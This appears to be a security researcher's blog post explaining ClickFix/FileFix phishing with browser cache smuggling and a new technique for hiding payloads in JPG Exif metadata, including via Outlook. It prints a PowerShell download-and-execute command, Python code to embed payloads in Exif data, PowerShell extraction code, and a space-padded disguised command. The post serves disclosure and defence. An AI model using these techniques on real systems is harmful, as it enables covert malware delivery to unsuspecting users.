Look At This Photograph - Passively Downloading Malware Payloads Via Image Caching

Look At This Photograph - Passively Downloading Malware Payloads Via Image Caching
文章描述了一种结合ClickFix和FileFix的网络钓鱼技术，并通过Cache Smuggling将恶意软件隐藏在浏览器缓存中。作者提出了一种改进方法，利用JPG图像的Exif数据存储payload以提高隐蔽性，并展示了如何通过PowerShell提取和执行隐藏的恶意代码。 2025-10-24 19:45:0 Author: malwaretech.com(查看原文) 阅读量:8 收藏

Recently, at my day job I came across this unique ClickFix / FileFix style phishing page. It merges FileFix and Cache Smuggling to avoid its first stage loader having to make any web requests. Instead, the loader simply extracts the second-stage payload from the web browser’s cache, where it was placed using Cache Smuggling.

This attack inspired me to come up with an improved, more versatile technique, which I’m going to detail here.

If you’re unfamiliar with Cache Smugging or ClickFix, I highly recommend you read my previous blog first.

A common ClickFix lure poses as a Captcha and attempts to social engineer the user into running malicious commands. This variant is typically seen pushed on to websites via malvertising, or compromising the web server.

A ClickFix variant masquerading as a Captcha test

In this case the fake Captcha prompts the users to press Win + R, Ctrl + V, then Enter. On Windows, the Win + R shortcut opens the Run window, which is used to launch executables. Ctrl + V pastes text from the clipboard, and Enter submits whatever text was pasted.

This attack leverages the fact the webpages can use JavaScript to write text to the user’s clipboard. In the background the website has already populated the clipboard with a malicious command, which will be run when the user enters it into the Run window.

Many script hosts such as PowerShell and WScript allow scripts to be passed as plaintext via the command line, which enables Run to be abuse to execute arbitrary code.

One limitation of the original ClickFix technique is that Run’s input text box limit is set to MAX_PATH (260 characters). This means that the attacker’s entire malicious script, as well as the command to invoke it, must be less than 260 bytes.

Run’s extremely low character limit aggressively restricts functionality, resulting in many threat actors resorting to rudimentary PowerShell & MSHTA downloaders, which are easily detected by security products.

An example of such would be the following command, which used the Net.WebClient object to download a second stage PowerShell script, then IEX (Invoke-Expression) to run it.

powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://example.local/payload')"

This is where a variant of the techniques known as FileFix comes into play.

For all intents and purposes FileFix is just ClickFix, but the lure social engineers users into pasting text into the Windows Explorer address bar instead.

Explorer’s address bar exhibits the exact same behavior as the Run window, except the address bar is limited to 2048 characters, which is significantly larger than the Run’s 260.

Many threat actors also leverage the fact that unless the user is running Explorer full-screen on an extremely large monitor, only a small portion of pasted text will be visible. Attackers abuse this by padding their commands with spaces, enabling them to dictate which portion the user sees (usually a comment containing a mundane file path or something).

The specific version we saw was masquerading as a FortiClient Compliance Checker.

The webpage containing the FortiClient phishing lure

This attack also benefits heavily from webpages being able to use JavaScript to open Windows Explorer for you. “Why is that even a feature?” you might ask. Well, it’s because cybersecurity was invented last year and before that everyone just implemented whatever.

What was unique about this specific FileFix variant is it incorporated cache smuggling.

Cache smuggling allows users to leverage the web browser’s cache to store arbitrary files onto the system. This enabled the malicious PowerShell command to avoid making any web requests at all, which is much less likely to be caught by EDRs or other security tools.

Typically, Browsers cache static web assets such as css, JavaScript, and images files. But as Aurelien, the author of the original cache smuggling blog discover, the file’s content doesn’t actually matter. Just set the HTTP Content-Type header to image/jpeg, embed an exe file using <img src="/malware.exe">, and the web browser will happily save the file to disk for you.

In the case of the FortiClient campaign, the JavaScript uses fetch() to retrieve a fake jpg, which is actually a ZIP file. The PowerShell script then simply just searches the browser’s cache folder for the ZIP file, then extracts and runs the malware from it.

Now, I do have one gripe with the technique as implemented in the FileFix campaign (and on the original blog). It simply just tries to pass off arbitrary file types as JP images. This means there’s no valid JPG header, thus, the image is invalid. This has several shortcomings:

Because the file is not a real JPG, the browser will consider it corrupted and show the broken image icon (which is likely why the phishing lure uses JavaScript to fetch() the image without loading it).
Any firewall doing TLS inspect should be alerting on mismatches between file header and file type/extension (which is a pretty old trick). I say should, because that implies we’re actually trying to do cybersecurity.
Touching a file on disk triggers an on-access scan by the antivirus. The second the PowerShell script interacts with the cache file, the antivirus will scan it. The filetype is irrelevant.

The latter issue can be easily mitigated by encrypting the cache-smuggled file, ensuring that the raw payload never touches disk. It’d only take a small addition to the loader to decrypting the payload after extracting it from the cache file.

But addressing the first two points requires some creativity.

My first thought upon seeing the Cache Smugging examples were: why not use steganography? Steganography enables us to conceal arbitrary data in an image by encoding it into individual pixels. We could encode the entire payload into a real image, then have the PowerShell script decode it.

Quite quickly, I realized why no FileFix variants have gone with this method. Trying to fit an entire JPG decoder into a less than 2048 byte script is close to impossible. Furthermore, we ideally want to use much less than the maximum character limit to give us space for padding (space for padding…get it? The padding is done with spaces…..ok, whatever, just forget it).

My next idea was using Exif data. JPGs support storing metadata in images via Exif (Exchangeable image file format). Typically, this is used by digital cameras to store data about a photo such as where/when it was taken, camera settings, model, lenses, etc. I wondered if one of the metadata fields would be large enough to store my second stage payload.

To my surprise, the size limit of the Exif header was much larger than expected. An entire 64-KB worth of metadata can be stored in the image. But better yet, a single Exif field can use up the entire 64-KB of space.

I also discovered a useful quirk with how metadata is parsed, which allows us to conceal Exif data from some parsers.

Truncating Exif Data

Exif fields can have different types (byte, short, long, float, ascii, etc). Standard ascii formatted text strings use a null byte to denote the end of the string. However, the Exif format specifics a length (count) field for every data type, including ascii. This means that while most text parsers will stop reading at the first null byte, the true size of the field can be much larger.

If we set the ascii field’s count value to the maximum possible, we can store up to 64-KB of data into it without breaking the Exif format. But since most software considers a null byte to denote the end of an ascii string, we can conceal data from many Exif parsers by placing a null byte prior to our payload.

Providing we use a field of ascii type, setting the value to something like <some text here><null byte><our payload>, should stop these parsers from displaying the portion of the field that contains the payload.

I tested this by setting the Image Description field to Definitely Not Malware\0 AAAAAAAAAAAAAAAAAAAAAAAAA using Python.

The Exif data as shown by Windows Explorer

As you can see, only the “Definitely Not Malware” portion of the string is visible when we view the Exif data with Right Click > Properties. However, when we open the image in a Hex Editor, we can still see the AAAAAAAAAAAAAAAAAAAAAAAAA portion is present in the Exif.

The image as seen in a Hex Editor

Since the Exif “count” values are used when performing Exif parsing, this does not interfere with any other Exif fields, or the rendering of the image. The data is entirely valid, it’s just normal for software not to read past the null byte when displaying a text string.

Since we’re able to store a single contiguous blob of binary data in the Exif header of the JPG, we don’t actually need an Exif parser to extract it. We can just wrap the data with some tags, then use RegEx to extract everything in between. I chose to wrap the data like so 13371337<payload data>13371337.

So my ImageDescription field now looks like this: Definitely Not Malware<null byte>13371337<payload data>13371337

Here is a snippet of the Python code I use to store my payload into the JPG’s Exif data.

image_description = b'Definitely Not Malware\x00'
full_payload = image_description + b'13371337' + payload_data + b'13371337'

This results in the payload data being hidden in the Image Description, which will simply display “Definitely Not Malware”.

Then to extract it via PowerShell, the following code should work:

$content = [System.Text.Encoding]::Default.GetString([System.IO.File]::ReadAllBytes($file_name));
$match = [regex]::Match($content, "(?s)13371337(.*?)13371337");

All the PowerShell script needs to do is iterate through the browser’s cache directory and wait for a RegEx match.

To demonstrate this, I put together a basic proof-of-concept phishing page which conceals a “Hello World” DLL inside the Exif data of the page logo.

Proof-of-Concept Phishing Lure

It replicates the FileFix technique where the malicious command is hidden with space, like so.

conhost.exe --headless powershell.exe -EncodedCommand <base64 command here> -ExecutionPolicy                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "\\\\NetworkShare\\Finance\\Reports\\EmployeeSalaries.txt"

When pasted into Explorer, this is all the user sees.

What the users sees while pasting the command into the Explorer address bar

The malicious command my example websites copied to the clipboard runs powershell.exe and passes a base64 encoded script. The encoded script is responsible for making a copy of the browser’s cache folder, then iterating through each file looking for the 13371337 placeholder.

In this case the payload is simply a hello world DLL file, which is not encrypted. Though adding encryption/decryption capabilities is trivial, I decided not to for the purposes of this example.

While most websites and services strip Exif metadata for privacy reasons, I did find another interesting attack surface: Microsoft Outlook.

Microsoft Outlook is essentially just a glorified Edge web browser, so it treats images the same way a browser would. This makes it possible to perform Exif Smuggling via email as well. Simply just attach the JPG in an email and send it to the target (I’m sure this behavior works with other clients too, but I only tested with Outlook).

What’s interesting about Outlook’s behavior is that it seems to both preemptively cache AND download images attachments, even when image previewing is disabled in the preview panel. In both cases the Exif data was not stripped, making it possible to use Exif Smugging to download a payload onto the target’s system without them even having to open the email.

Although malware is still required to extract and execute the payload from the cache, this technique provides many alternatives means for getting second stage payloads onto a target systems. Malicious software, scripts, and exploits are known to perform web requests to download second stage payload. With Exif Smuggling, the need for downloading or embedding second stage payloads can be eliminated entirely.

Though malware leveraging Exif data to conceal malicious code is nothing new, it’s typically only been used in the context of images downloaded by the malware itself. But when combined with Cache Smuggling, any software which caches images (without first stripping exif data) can be used to passively download follow-up payloads.

This functionality is not just limited to ClickFix, since it could also be used to make c2-less loaders. Instead of performing web requests, the loader would simply monitor various software cache directories for files containing predetermined signatures.

Consequently, it’s important that security vendors not rely on the assumption that a malicious script must either embed a payload directly, or perform a web request to fetch one. If the second stage payload has already been smuggled onto the system via caching, controls which restrict script’s ability to make web requests are rendered ineffective.

For more, follow me on Bluesky, LinkedIn, Threads, or Mastodon. I plan on posting the source code for the Proof-of-Concept next week.

Here is a link to the Exif Smuggling + FileFix Proof-of-Concept I wrote for Chrome.

文章来源: https://malwaretech.com/2025/10/exif-smuggling.html
如有侵权请联系:admin#unsafe.sh